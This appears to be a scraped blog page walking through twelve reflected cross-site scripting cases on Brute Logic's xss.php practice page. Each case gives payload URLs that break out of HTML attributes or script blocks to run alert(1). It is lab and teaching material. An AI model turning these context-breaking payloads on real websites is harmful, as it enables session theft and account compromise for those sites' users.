Single Reflection

Case 01 - Direct URL Injection (no parameter)

payload:

https://brutelogic.com.br/xss.php/"><script>alert(1)</script>

https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>

Source-Based XSS Test Cases

 

Source-Based XSS Test Cases

 

Case 02 - Simple HTML Injection (a)

https://brutelogic.com.br/xss.php?a=1"<script>alert(1)</script> 

Source-Based XSS Test Cases

 

Source-Based XSS Test Cases

 

Case 03 - Inline HTML Injection with Double Quotes (b1)

 https://brutelogic.com.br/xss.php?b1=1"><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b1=1"><svg onload=alert(1)>

Source-Based XSS Test Cases

Source-Based XSS Test Cases

 

Case 04 - Inline HTML Injection with Single Quotes (b2)

https://brutelogic.com.br/xss.php?b2=1'><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b2=1'><svg onload=alert(1)>

Source-Based XSS Test Cases

Source-Based XSS Test Cases

 

Case 05 - Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

https://brutelogic.com.br/xss.php?b3=1" onmouseover=alert(1)//

Source-Based XSS Test Cases

Source-Based XSS Test Cases

鼠标移动到此处,就会触发XSS

Case 06 - Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

https://brutelogic.com.br/xss.php?b4=1' onmouseover=alert(1)//

Source-Based XSS Test Cases

Source-Based XSS Test Cases

 

 Case 07 - HTML Injection with Single Quotes in JS Block (c1)

https://brutelogic.com.br/xss.php?c1='</script><svg onload=alert(1)>

Source-Based XSS Test Cases

Source-Based XSS Test Cases

Case 08 - HTML Injection with Double Quotes in JS Block (c2)

https://brutelogic.com.br/xss.php?c2="</script><svg onload=alert(1)>//

Source-Based XSS Test Cases

Source-Based XSS Test Cases

Case 09 - Simple JS Injection with Single Quotes (c3)

https://brutelogic.com.br/xss.php?c3='-alert(1)-'

Source-Based XSS Test Cases

Source-Based XSS Test Cases

Case 10 - Simple JS Injection with Double Quotes (c4)

https://brutelogic.com.br/xss.php?c4="-alert(1)-"

Source-Based XSS Test Cases

Source-Based XSS Test Cases

 

Case 11 - Escaped JS Injection with Single Quotes (c5)

https://brutelogic.com.br/xss.php?c5=\'-alert(1)//

Source-Based XSS Test Cases

Source-Based XSS Test Cases

Case 12 - Escaped JS Injection with Double Quotes (c6)

https://brutelogic.com.br/xss.php?c6=\"-confirm(1)//

https://brutelogic.com.br/xss.php?c6=\"-alert(1)//

Source-Based XSS Test Cases

Source-Based XSS Test Cases

 

相关文章:

  • 2021-04-10
  • 2022-02-02
  • 2022-12-23
  • 2021-11-11
  • 2021-04-04
  • 2022-12-23
  • 2021-08-18
  • 2021-10-18
猜你喜欢
  • 2021-10-27
  • 2022-02-17
  • 2022-01-14
  • 2022-01-19
  • 2022-12-23
  • 2021-04-03
  • 2021-10-26
相关资源
相似解决方案